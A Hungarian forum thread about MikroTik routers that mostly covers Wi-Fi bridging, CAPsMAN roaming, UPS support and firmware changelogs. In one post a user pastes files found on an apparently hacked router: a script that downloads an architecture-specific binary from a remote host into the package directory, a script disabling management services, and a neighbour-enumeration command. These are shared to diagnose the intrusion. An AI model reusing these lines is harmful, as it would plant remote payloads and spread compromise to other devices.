Hirdetés

2024. április 25., csütörtök

Gyorskeresés

Téma összefoglaló

Téma összefoglaló

  • Utoljára frissítve: 2021-08-17 20:43:18

LOGOUT.hu

Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.

Összefoglaló kinyitása ▼

Hozzászólások

(#5901) Zwodkassy válasza ekkold (#5900) üzenetére


Zwodkassy
senior tag

Ethernet kábel a két kis AP-hoz. Tuti megoldás 😀

(#5902) Fooler89 válasza Zwodkassy (#5901) üzenetére


Fooler89
őstag

kivétel mikor neked kell kábelezni :D

(#5903) janos666


janos666
nagyúr
LOGOUT blog

Viszonylag normális az, ha egy emeletes ház ablakán kinéző ASUS N66U-t (az eredeti dual-band omni-directional antennáival) kicseréltem egy SXT Lite2 r3-ra (használtan vettem, ROS 6.43.4-re frissítettem és reset-eltem), ami egyenesen a "célra" néz (nevezzük úgy "sufni" ablakára), akkor roszabb lett a helyzet (eddig szimplán lassú és néha szakadt, most alig csatlakozik fel a kliens és mikor mégis, akkor lassabb)?
Az N66U hírhedten hangos (régi firmware-el nem felel meg az FCC-nek), de az SXT-nek papíron 10 dBi az antenna nyeresége. (A teszthez manual-txpower módba tettem, vagyis elvileg 27db max, amit ír.)

Nem azt tartom lehetetlennek, hogy nem működik jól az SXT sem ebben a szituációban, csak hogy relatívan rosszabb ez, mint az omnnis cucc. :U

Azért ez volt a lépés, mert az SXT-t fel lehet tenni magasabbra kültéren (míg a beltéri ASUS-t nem), így már remélem elég lesz. De így elbizonytalanodtam, hogy elég lesz-e kicsit jobb elhelyezéssel az SXT, ha most így muzsikál.

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5904) ekkold válasza janos666 (#5903) üzenetére


ekkold
Topikgazda

Az SXT lite2-t level3 licencel forgalmazzák, ami nem enged AP módot, csak bridge-t. Azaz csak pont-pont kapcsolatra, vagy kliensnek jó.

A csatlakozás pedig (a típustól függetlenül) a klienseken is műlik, meg a másik oldal vételi-érzékenységén is.

(#5905) ekkold válasza Zwodkassy (#5901) üzenetére


ekkold
Topikgazda

Igen, de gondolom abban az esetben fel sem merült volna a probléma.

(#5906) gabyka válasza janos666 (#5903) üzenetére


gabyka
aktív tag

Szerintem az sxt-t rakd a sufnira kliensnek...

(#5907) janos666 válasza ekkold (#5904) üzenetére


janos666
nagyúr
LOGOUT blog

Működik a pont-pont kapcsolat Bridge módba rakott Level3 Mikrotik (most abban van ez az SXT) és 1 darab tetszőleges (nem csak Mikrotik) kliens közt is.
Ezt most frissen is kipróbáltam újra az aktuális ROS verzióval (mikor teszteltem, hogy jól konfigoltam és nem szemetet adtak-e el): itthon az asztalon letettem mellé egy telefont, és pörgettem rajta a szintetikus adatforgalmat iperf3-al. Gond nélkül ketyegett, nem szakadozott és jól volt a sebesség is.

Nyilván ezer dologtól függ minden ilyen, de annyit csináltam, hogy felemeltem az ablaküvegnek támasztott N66U-t, aminek az egekbe néztek az omni antennái, és odatettem a helyére az SXT-t, beforgatva, hogy lehetőség szerint legjobban a kliensgépre nézzen (pontosabban annak az épületnek az ablakára, ahol az van).
Egyetlen mobiltelefont kéne csak a hálózaton tartania. Az N66-nak nagyjából sikerült (saccra úgy óránként szakadt csak le), csak kicsit kellett volna jobb, de helyette egyértelműen rosszabb lett (már tiltólistázta is az Android az AP-t, előtte pedig percenként leszakadt).
Én most ezen lepődtem meg picit, hogy relatívan rosszabb ide ez az STX.

Még azt tudod megtenni low-buget kreatív-barkácsolgatással, hogy viszek a "sufni" ablakba egy leselejtezett Atheros rádiós TP-Link router-t, és megpróbálok WDS-t összedobni OpenWRT és Mikrotik ROS közt (vagy ha az nagyon nem, akkor NAT-olni vele, de azt nem szeretem). Szokott a WDS sikerülni? (Úgy tudom a fontosabb, hogy a chipset kompatibilis legyen.)

(#5906) gabyka - De akkor sokkal több eszköz kell: egy AP a főépületbe (pl. egy második SXT, vagy marad a helyén az N66U), a sufnis kliens SXT, és még egy AP a sufniba, amire végül a telefon csatlakozhat.
Ezt akartam megúszni, különben 2db Lite5-öt vettem volna 1db Lite2 helyett (+ az N66U vagy valami régi TP-Link szemét ment volna át a sufniba AP-nek).

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5908) bambano válasza janos666 (#5907) üzenetére


bambano
titán
LOGOUT blog

"Működik a pont-pont kapcsolat Bridge módba rakott Level3 Mikrotik (most abban van ez az SXT) és 1 darab tetszőleges (nem csak Mikrotik) kliens közt is.": ezt csak halkan mondd, mert az általános esetet a szabvány tiltja. egyes speciális esetekben előfordulhat, hogy működik a wifi bridge, de az kivétel.

Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis

(#5909) bacus


bacus
őstag

A legfrissebb ros-t tegnap többször is sikerült kiborítanom. Upgradeltem egy routert. Az upgradelt routernél több bridget definiáltam, régi verzióról ment a legfrissebbre, minden probléma nélkül. A bridgeknél azt a bridget kinyitva ahol a hw offload is van, beikszelve a fast forward opciót, a router újraindításig megdöglik.

Wikin írják, hogy nem lehet bekapcsolva, de hagyja :)

Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30

(#5910) bacus


bacus
őstag

akinek már törték fel a routerét az mit tapasztalt? meghagyták rajta a konfigot? megváltoztatták a jelszavát?
mik a tünetek?

Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30

(#5911) Sly\'s válasza bacus (#5910) üzenetére


Sly\'s
csendes tag

Nekem az elmúlt cirka 14 év alatt, egyszer sem törték meg az általam felügyelt routereket...

Remélem nem csak a szerencsének köszönhetően... ;)

Üdv. Slys!

(#5912) janos666 válasza bambano (#5908) üzenetére


janos666
nagyúr
LOGOUT blog

Nem is akartam, míg nem jött a válasz, hogy ez a baj.
Ha akarja törölheti topikgazda/moderátor.

Viszont a WDS már nem működik Atheros-os Mikrotik és Atheros-os OpenWRT közt (ezt ROS L4-es AP-vel is kipróbáltam). Szóval majd kereshetek oda valami használt L4-es Mikrotik AP-t. (Elkezdtem beállítani az OWRT-n WALN->WLAN NAT-ot, de 10-20 perc után felhúztam magam rajta, hogy valamiért nem sikerült.)

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5913) bacus


bacus
őstag

Nekem lehet most megvan az első :D, nem én felügyeltem, lehet csak átírták a jelszót. A tulaj kért volna változtatást, én meg nem tudok belépni, kérdeztem kollégám, azt mondta ő nem frissített, nem lépett be, de most amit látok, hogy 6.43.2 verzió van rajta, sztem nem ez volt, ez túl friss.

Egyébként ez nem a fő router, hanem a tulaj dmz-be rakta, elvileg így tudott távolról belépni, mert a fő routere az szolgáltatói..

Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30

(#5914) Zwodkassy válasza bacus (#5910) üzenetére


Zwodkassy
senior tag

Én két hete találkoztam egy ilyen Mikivel. A kollégák szóltak, hogy nem érik el a mögöttes szolgáltatást (nem ment a Port-Forward). 6.37.5 volt rajta, a kutya nem foglalkozott vele. Átirogattak néhány tűzfal szabályt, meg scripteket. Majd ha gép előtt ülök, bemásolok néhány szemelvelényt (már amit lementettem).
Ami érdekes, nem tudom frissíteni rajta a ROS-t. Megfogott.

(#5915) quby


quby
őstag

Sziasztok. Capsman gurukat kérdezném:

A követketöt szeretném megoldani: Több AP, van ami csak n-es meg van 3 AC-s is. Két SSID kellene ugy hogy mindkét SSID menjen 2.4-en és 5 Ghz-en is. Nyilván ahol n-es ap van ott csak n-es. A multi ssid megy. Provisioningnél master-slave felállásban. De a két bandet fogalmam sincs hogy hogy kell hozzáadjam. Ha két különbözö provisiont csinálok akkor csak az egyik él, többnyire az elsö. Mi itt a megoldás? Leginkább a miérteket szeretném tudni nem a hogyanokat!

A legügyesebb állat az ürge, hiszen búzával teli pofazacskóval is képes repülni, miközben egy bagolyt egyensúlyoz a hátán.

(#5916) Zwodkassy válasza bacus (#5910) üzenetére


Zwodkassy
senior tag

Találtam egy "cgret" nevű fájlt a következő tartalommal :

"#!/flash/xbin/bash
if [ "$2" == "" ]; then
echo "dst?"
exit
fi
/nova/bin/info '/tool fetch host="cloudrouter.online" url=("http://104.24.112.169/images/".[/system resource get architecture-name]."/'$1'") dst-path=tmpdf1'
mv /flash/rw/pckg/tmpdf1 $2"

Volt egy "exsvc.rsc" nevű fájl :

"# oct/03/2018 04:24:32 by RouterOS 6.37.4
# software id = xxxx-yyyy
#
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes"

Egy "r1.rsc" fájl :

"/foreach m in=[/ip neighbor find where platform~"MikroTik"] do={/put ([/ip neighbor get $m version]." ".[/ip neighbor get $m software-id]." ip=".[/ip neighbor get $m address4] )}"

Találtam egy "bbox.jpg" fájlt, ami nem kép az tuti. Nem elemezgettem még.
És még egy "mikrotik.php" neű fájlt, de ennek 0 byte a mérete (?).

[ Szerkesztve ]

(#5917) bacus válasza Zwodkassy (#5916) üzenetére


bacus
őstag

Én majd szerdán távvezérléssel reseteltetem a routert, megnézem mi volt majd, ha elmenti a konfigot a router.

Kíváncsi vagyok, hogy tudom e majd frissíteni.

Nekem az fura, hogy egy reset után megmaradnak scriptek a routerben. Egy ilyen hard reset után olyan állapotba kellene kerüljön a router, mintha friss netinstallal feltett verzió lenne, minden üres, nincs régi konfig sem.

Én azt gondolom, hogy a felprogramozása egy ilyen routernek az az igazi érték, ezt védeném. Ha a tulaj reseteli, programozza újra elölről, mert ez így nem tisztességes teljesen, hogy reset, jelszó vált és ..

Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30

(#5918) dmc


dmc
aktív tag

Sziasztok!
Szeretnék egy kis segítséget kérni .
Adva van egy RB2011UIAS-RM ruter ugye ezen van egy USB port arra rá dugtam egy UPS USB vezetékét de sehogy se tudom életre kelteni.
Ahogy a képen látszik nekem ez jelenik meg.
Nem lehet rátenni az UPS t ?
A segítséget előre is köszönöm!

[kép]

[ Szerkesztve ]

(#5919) Zwodkassy válasza dmc (#5918) üzenetére


Zwodkassy
senior tag

Az UPS csomagot felraktad a routerre (ROS alá)?

(#5920) Sly\'s válasza dmc (#5918) üzenetére


Sly\'s
csendes tag

MikroTik UPS leírás

The UPS monitor feature works with APC UPS units that support “smart” signalling over serial RS232 or USB connection.

Google fordítva: Az UPS monitor funkció az APC UPS egységgel működik, amely "intelligens" jelátvitelt biztosít soros RS232 vagy USB csatlakozáson keresztül.

Üdv. Slys!

(#5921) pappkarcsi


pappkarcsi
senior tag

Sziasztok!

Szeretnék segítséget kérni hardver választás tekintetében. Egy kisebb irodai hálózatot szeretnék kiépíteni, ahol lenne egy Hikvision NVR, és kb 10 laptop/telefon. Az NVR vezetéken, a többi eszköz pedig wifin kellene, hogy csatlakozzon. A magas rendelkezésre állás érdekében az eddig épített rendszerekhez képest, ahol tp-link és asus eszközökkel építettem ki ezt, most szeretnék Mikrotik-et használni.
2 szint lesz, 150 nm szintenként. Az irodában lenne a bejövő net, az router és az nvr. A falak gipszkartonok, így terv szerint elég lesz szintenként 1-1 AP. A bejövő net kb 50-100 Mbit lenne, ennek kellene a max 10-12 eszközt kiszolgálni.. (netezés, messenger, youtube, instagram).

Az eddig kinézett eszközök: hex poe + Cap AC
Ezekhez mit szóltok?

Az NVR-hez tartozik 8 kamera, de azokat a felvevőbe kötöm közvetlen, így ez a hálózatnak nem lesz "része".
Ahhoz, hogy a kamera kilásson a netre és azt kintről el lehessen érni, a gyártó ad egy ingyenes ddns funkciót, ezt az nvr-ben lehet regisztrálni. ros oldalról külön engedni kell valamit?

Tekintettel arra, hogy a ros számomra teljesen új, de alapvetően informatikai vénával rendelkezem, nem hiszem, hogy a neten található tutorialok alapján ne tudnám összerakni. Kiindulásnak ezt a guide-ot használnám, mert én is szeretnék egy ssid-t használni.
http://loloke.hu/seamless-roaming-megvalositasa-mikrotik-kornyezetben/

Segítő válaszaitokat, guide-okat és videolinkeket a témában előre is köszönöm! :R

Regisztrált: 2007 - 99 pozitív értékelése van és nincs negatív értékelése

(#5922) dmc válasza pappkarcsi (#5921) üzenetére


dmc
aktív tag

Szia!
Én általába ezeket szoltam ilyen helyre használni:
AP: [link]
Legutóbb berakott eszköz ez volt :[link]
Én személy szerint a Hikvisiont nem igen szeretem.

(#5923) akos86


akos86
aktív tag

Sziasztok!

Beszereztem egy Mikrotik hAP ac2 routert be is konfiguráltam a routert, kábelen és wifin is van internet hihetetlen mennyi beállítási lehetőség van benne. Most ismerkedem a felülettel illetve a Router Os rendszerrel teljesen magával ragadott. A jelenlegi problémám az hogy az itthoni 120mbit-es internet ami kábelen meg is van, de wifin valamiért csak olyan 60-65mbittel jön szerintem ebben jóval több is lenne, mit ronthattam el? Valószínű hogy én nem jól állíthattam be valamit. Bármilyen tanácsot/segítséget szívesen fogadok.

3dfx, gone but never forgotten...

(#5924) bambano válasza pappkarcsi (#5921) üzenetére


bambano
titán
LOGOUT blog

pontosan miért is szeretnéd, hogy a kémkedő hikvision kamerák kijussanak a netre?

Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis

(#5925) dmc válasza bambano (#5924) üzenetére


dmc
aktív tag

Gondolom a főnökség rá szeretne nézni otthonról a munkásemberekre hogy dolgoznak e :D

(#5926) asdf_ válasza dmc (#5925) üzenetére


asdf_
veterán

VPN-ezzenek be, aztan nezzek lokalbol. Nekem is averzioim vannak az IP kamerak kozvetlen netreengedese kapcsan.

(#5927) bambano válasza dmc (#5925) üzenetére


bambano
titán
LOGOUT blog

Kínából? :)

egyébként azt remek ötlet dobra verni, merthogy teljesen törvénytelen.

Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis

(#5928) janos666 válasza pappkarcsi (#5921) üzenetére


janos666
nagyúr
LOGOUT blog

A seamless-roaming cikket szerintem felejtsd el. Legutóbb pont emiatt vettem itthonra Mikrotik hAP AC2-ket (más célra ismertem és szerettem már a márkát), de nálam nem látszik segíteni semmit a roaming-on a CAPsMAN, és így azóta is furdal, hogy az Ubiquiti cuccai jobbak lettek-e volna erre a vágyra (roaming).

Szerintem csak egy port forward kell az NVR-ra, és azon keresztül éred el a kamerák real-time stream-jét is WAN-on, miután beléptél az NVR-ra a saját manager szoftverükkel (ha van ilyen funkciója az NVR-nak, nem ismerem a Hikvision-t), vagy amit már rögzített az NVR (ezt a "múltat" szinte minden NVR-on eléred).

Én személy szerint kihagynám az NVR-t, ha van a hálózaton valami amúgy is 24/7 online PC, vagy összeraknék erre valami kis gépet (Intel J szériás integrált deszkákból, vagy akár egy Raspberry, stb) ffmpeg-el rögzíteni az RTSP stream-et, és akkor lehet minden kamera a LAN-on vagy akár a WAN-ra is forward-olt.

Pl. egy egyszerű linux bash script kivált egy NVR-t.:
while :; do sleep 1 && ffmpeg -rtsp_transport udp -i rtsp://192.168.1.201/user=admin_password=yyy_channel=1_stream=0 -vcodec copy -an -t 3600 /mnt/data/surveillance/XXX/1/`date +%Y.%m.%d_%H.%M`.ts 2>/dev/null; done
Plusz egy cronjob ami törli a régi file-okat ebből a mappából. (Az URL persze márka/típus függő.)

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5929) bacus válasza janos666 (#5928) üzenetére


bacus
őstag

A seamless roaming kiválóan működik a capsmannal, jó pár helyen konfiguráltam 2 - 8 caps-al, itthon is használom 3 caps-al kiválóan megy.

Sok leírás van, könnyű felkonfigurálni, működik.

Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30

(#5930) e90lci válasza bacus (#5929) üzenetére


e90lci
senior tag

+1
Nálam is működik igaz csak egy Cap-al (wap ac).Még gondom nem volt vele,kb 5 perc felkonfigolni.

(#5931) janos666 válasza e90lci (#5930) üzenetére


janos666
nagyúr
LOGOUT blog

Mi? :Y Roaming 1 CAP-el? Roaming? Raom A-ról A-ra és vissza A-ra? :C ;]

(#5929) bacus - Lehet, hogy csak ezekkel a még mindig viszonylag új IPQ-4018 chipsetekkel van szoftveres (ROS) gond, vagy az épp tesztelt kliensek a reménytelen ügyek és kivételek (többnyire Qualcomm chipset-es kütyüket néztem, bár mind AC wave-1 vagy N, nem wave-2, de próbáltam Intel AC kártyás notival is sétálgatni).

Maga a CAPsMAN működik és nyilván roaming-ol is a kliens, csak épp nem látom, hogy bármivel simább vagy gyorsabb lenne a roaming, ha CAPsMAN alatt vannak az AP-k, mint ha teljesen önállóan vannak a levegőben.
Így is, úgy is vált előbb-utóbb a kliens, de sohasem teljesen észrevétlen (vagy csak véletlenszerűen néha elég gyors, hogy annak nevezzem, de nem kiszámíthatóan) és nem láttam, hogy függne a jellemző/átlagos roaming újracsatlakozási idő a CAPsMAN-től (szerintem ránézésre mindig a klienstől függ, akár CAPsMAN, akár nem).

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5932) Zwodkassy válasza janos666 (#5931) üzenetére


Zwodkassy
senior tag

😀😀😀😀😀

(#5933) e90lci válasza janos666 (#5931) üzenetére


e90lci
senior tag

Bocs elírtam hap ac2 -wap ac

[ Szerkesztve ]

(#5934) ekkold válasza bacus (#5929) üzenetére


ekkold
Topikgazda

Megvalósítható-e caps-al a következő (jelenleg egyénileg vannak konfigurálva):
- Fő router (hAPac2):
2,4GHz-en két hálózat (fő és vendég), 3 különböző ssid (1 főhálózaton és 2 vendéghálón)

5GHz egyelőre csak a fő hálózat 1db ssid

- AP1 (RB951G)
2,4GHz-en két hálózat, 4 különböző ssid (2 főhálózaton és 2 vendéghálón)

- AP2 (haPAac)
2,4GHz-en két hálózat, 5 különböző ssid. 2 a főhálózaton, 2 a vendéghálón + 1ssid egy IPcam számára. Ez utóbbi elkülönített IP tartományban (nem kap netet), AP2 oszt neki IP-t, és ennek az RTSP elérését (egyetlen port) dst-natolja az AP2, a saját IP címére. Így én elérem a kamerát viszont a kamera nem ér el semmi egyebet.
A kamera külön hálózata ill. IP tartománya nem látszik a hálózat többi részéből.

5GHz egyelőre csak a fő hálózaton 1db ssid (később 2 ssid kell majd a fő hálózatra)

Mindegyik AP-n van még néhány további ssid, ami alaphelyzetben nem használt (le van tiltva), de néha be kell kapcsolni, egyszerre többnyire csak egy AP-n.

A fő háló közvetlenül, a vendégháló ezen belül egy VLAN-ban jut el az AP-khoz, UTP kábelen.

Jelenleg minden működik, ahogy kell. Tehát érdemes-e caps-al küzdeni? Könnyebb ill. átláthatóbb lenne-e tőle a kezelése?

(#5935) #42556672 válasza janos666 (#5928) üzenetére


#42556672
törölt tag

Nekem 2 CAP AC és egy HAP AC2 van egy RB3011 CAPS MAN mögött és hibátlanul működik!

(#5936) janos666 válasza #42556672 (#5935) üzenetére


janos666
nagyúr
LOGOUT blog

Az egyértelműség kedvéért leírnád kérlek (és aki még hozzászólt), hogy pontosan mit tapasztalsz: CAPsMAN és önállóan konfigurált AP-k közti szituációkban roaming ügyben?

Többszöri tesztelés után is egyértelműen azt látod, hogy CAPsMAN-el szignifikánsan gyorsabb az újracsatlakozás, vagy akár szó szerint teljesen észrevétlen (meg sem szakadnak az aktív kapcsolatok)?

Azonos vagy eltérő csatornákon vannak az AP-k?
Minden AP és a kliens is dual-band (engedélyezve van a 2G és 5G rádió mindenen, AP-ken és klienseken is)?
Ha igen, akkor ugyan az az SSID? Csak 2G-n és 5G-n belül külön-külön, vagy az összes rádión?

Többféle kliens eszközzel is teszteltél (pl. random okostelefon), vagy csak valami kézileg finomhangolt beállításokkal üzemelő PC-vel mászkáltál szép óvatosan?

Lehet, hogy valahol valami apróság hiányzik nálam, de...

/caps-man channel
add band=2ghz-onlyn extension-channel=eC frequency=2472 name=13-9
add band=2ghz-onlyn extension-channel=Ce frequency=2452 name=9-13
add band=5ghz-n/ac extension-channel=Ceee frequency=5180 name="36-42 (5170-5250)"
add band=5ghz-n/ac extension-channel=Ceee frequency=5500 name="100-106 (5490-5570)"

/caps-man datapath
add bridge=bridge1 client-to-client-forwarding=yes name=datapath1

/caps-man security
add authentication-types=wpa2-psk encryption=aes-ccm name=security1 passphrase=XXXXXXXXXXXXX

/caps-man configuration
add channel=13-9 country="hungary" datapath=datapath1 distance=indoors hw-retries=15 name=2g security=security1 ssid=YYY
add channel="100-106 (5490-5570)" country=hungary datapath=datapath1 distance=indoors hw-retries=15 name=5g security=security1 ssid=YYY

/caps-man interface
add channel=9-13 configuration=2g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=2g-F17a_AP_0b-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX
add channel=13-9 configuration=2g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=2g-F17a_AP_1c-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX
add channel="36-42 (5170-5250)" configuration=5g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=5g-F17a_AP_0b-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX
add channel="100-106 (5490-5570)" configuration=5g disabled=no l2mtu=1600 mac-address=XXXXXXXXXXX master-interface=none name=5g-F17a_AP_1c-1 radio-mac=XXXXXXXXXXX radio-name=XXXXXXXXXXX

Az SSID mindig ugyan az. Próbáltam tartományonként azonos csatornákkal (mint látszik is, alapértelmezésben először minden AP ugyan azt a csatit kapta, később szedtem szét kézzel, mikor láttam hogy annak nem volt haszna).

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5937) #42556672 válasza janos666 (#5936) üzenetére


#42556672
törölt tag

A földszinten 2db. AP-van (1db. HAP AC2, 1db. CAP AC)
Az emeleten 1db. AP-van ( 1db. CAP AC)
A szolgáltató felé egy RB3011

2db. SSID-t szórnak egyet a vendégeknek és egyet nekem minden alább megadott csatornán, mindkét frekvencián.

2,4GHz-n a használt csatornák: 1, 6, 11
5GHz-n használt csatornák: 36, 44, 52

Nem akartam VLAN-t így 2 bridge-et csináltam 2 DHCP pool külön tartománnyal amiket nem route-olom egymáshoz.

Nem tapasztalok megszakadást, folyamatosan sétálgatva Skype meeting-eken amit gyakran itthonról nyomok egy OnePlus 5 telefonnal semmilyen megszakadást nem tapasztalok. Egy Lenovo X1 Yoga a másik alany, azzal nem mászkálok annyit, de ha felmegyek az emeletre mert meló közben zavar a család azzal sincs megszakadás.

[ Szerkesztve ]

(#5938) janos666 válasza #42556672 (#5937) üzenetére


janos666
nagyúr
LOGOUT blog

Kösz a részletes választ. :R
De egy kulcspont még mindig hiányzik: mit tapasztalsz, ha nem CAPsMAN alatt futnak az AP-k és sétálgatsz? Van különbség? Olyankor rendszeresen megszakad a videóhívás AP váltáskor?

Arra célzok, hogy biztos a CAPsMAN érdeme-e vagy szimplán "okosan" vándorolnak maguktól is a gépeid. Nekem is van olyan, ami igen, de van ami nem. Van ami MAN-al is ügyetlen és van ami anélkül is ügyes...
Ezért nem vagyok meggyőzve, hogy úgy igazából bármit is segít a MAN.

[ Szerkesztve ]

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5939) #42556672 válasza janos666 (#5938) üzenetére


#42556672
törölt tag

Az a helyzet, hogy sem kedvem sem időm ezért a tesztért szétszedni a konfigom így erre a kérdésedre nem tudok válaszolni. Azért vettem ezeket a cuccokat, hogy így működjön. Előtte volt pár különféle routerem, AP-m de ezt a kényelmet sosem tudtam kihozni belőlük, a végtelenségig rajta ragadt a kliens a gyenge térerejű cuccon, akkor is ha már ott ordított mellette a másik. Ha ugyanazt az élményt adná nem öltek volna bele energiát az összes valamire való cuccot gyártó cégek a megalkotásába.

-szerintem!-

(#5940) janos666 válasza #42556672 (#5939) üzenetére


janos666
nagyúr
LOGOUT blog

Ezt nyilván megértem.

Az előbbi 10-20 percben fel-alá szaladgáltam a házban legalább tízszer két telefonnal a kezeimben: megpróbáltam videóra venni egy "connection aborted" üzit (és ahogy eltűnik néhány másodpercre, majd újra megjelenik a WiFi logó az Android teló felső sávjában), de azon kívül hogy hülyén néztem ki, nem jártam sikerrel, sohasem szakadt meg a TCP kapcsolat (csak lelassult ~0 körüli sebességre pár másodpercre, de nem zárult le).

Lehet, hogy mikor legutóbb játszottam hasonlót (csak akkor nem próbáltam videózni), épp előttem sorban az ezerből-egynéhány eseteket, vagy pont valami ritka rossz együttállás volt a szoftver verziókkal, vagy az "éterrel".

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5941) bacus válasza ekkold (#5934) üzenetére


bacus
őstag

Ha valami működik, azt ne akarjuk megjavítani ;)

Capsman -nál igazából csak egy routeren állítgatsz, ha capsman forwarding van, akkor ott látsz mindent.
Én eddig ilyen bonyolult valamit nem csináltam, mint amit írsz. Két ssid, 2,4 és 5 gigán (nyilván ahol az ap tudja).

Ha valahol szakadozik, oda kell még egy ap és jó lesz.
5 gigán sokkal stabilabb, gyorsabb, nyilván nincs annyi zavarás, egymást se zavarják. Külön frekin megy.

Kössünk egyezséget, megegyezős egyezséget... https://www.paypal.me/engiman/30

(#5942) macimeister


macimeister
aktív tag

Sziasztok.

Ügyfeleimhez mostanában ha szükséges akkor mikrotik routert rakok.
Milyen módszerrel tudnám esetleg megoldani, hogy ezek az eszközöket tudjam távolról kezelni ha esetleg valamit változtatni kell? Illetve jó lenne ha listában látnám az ügyfeleket és a Router online offline állapotát?

(#5943) Cirbolya_sen válasza macimeister (#5942) üzenetére


Cirbolya_sen
aktív tag

Szia, pont erre van a winbox, de figyelni kell a biztonsagi beallitasokra.

Cirbolya_sentinel

(#5944) Zwodkassy válasza Cirbolya_sen (#5943) üzenetére


Zwodkassy
senior tag

És a WinBox-al szépen, átláthatóan tudsz monitorozni 10, 20 vagy akár 100 db routert 😀

(#5945) Ablakos válasza Zwodkassy (#5944) üzenetére


Ablakos
őstag

Nem ezzel volt gond legutóbb a (nem rosszindulatu) hekkeléseknél? (Nyitott port a net felől.)

(#5946) #42556672 válasza macimeister (#5942) üzenetére


#42556672
törölt tag

WinBOX, de ha biztonságosan akarod akkor VPN-nel menj be rá és a WAN port felől ne tedd elérhetővé!

(#5947) Zwodkassy válasza Ablakos (#5945) üzenetére


Zwodkassy
senior tag

Ezzel is 😀
Tudtommal maga a RouterOs volt a gond/hibás

(#5948) ekkold


ekkold
Topikgazda

Nézem a changelog-ot és nem értem. Miért adtak ki egy 6.43.3 verziót úgy hogy sem hibajavítás sem új funkció nem került bele?

Release 6.43.3 2018-10-18
What's new in 6.43.3 (2018-Oct-05 13:12):
(factory only release)

Netán megint valami súlyos hibát javítottak, amit elfelejtettek beírni ide?

(#5949) janos666 válasza ekkold (#5948) üzenetére


janos666
nagyúr
LOGOUT blog

A Factory-only tippre szerintem ezeket jelenetheti:
- Mostantól ez a verzió kerül a frissenn gyártott hardware-ekre a gyárban
- A szoftveresek ki akarták adni, de megbukott valami utolsó belső teszten
- Valamilyen speciális, házon belüli tesztelési célra készítették (kis változtatással a legutóbbi "release" kódhoz, nem a legfrisebb béta/RC kódból)

TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."

(#5950) ssarosi


ssarosi
tag

Van egy 100 éve konfigurált RB2011 wifis routerem v6.40.9 ROS-el.
Tegnap rátettem a v6.42.9 verzót frissítésként.
Innentől kezdve nem értem el belső hálón, sem winboxal sem böngészőn keresztül.
A router egyébként működött, ment a net, a wifi is.
Reset lett a vége, downgrade és config visszaállítás backupból.
Mit csináltam rosszul?
Vagy lehet valami a configban amit másképp kellene megoldani?
Nem tudok rájönni.

Van még egy problémám.
A mac alapú hozzáférés nálam nem akar működni. Soha nem volt jó a kb. 3 év alatt.
1-2 mp után ledob, ennyi idő alatt semmit sem lehet csinálni, pl. ip címet adni.
Olvastam, hogy nem szereti a virtuális gépeket vagy virtuális switchet.
A laptopomról sem megy, azon pedig nincs hyper-v.
Ötlet, tanács?

Köszönettel: :R

[ Szerkesztve ]

Copyright © 2000-2024 PROHARDVER Informatikai Kft.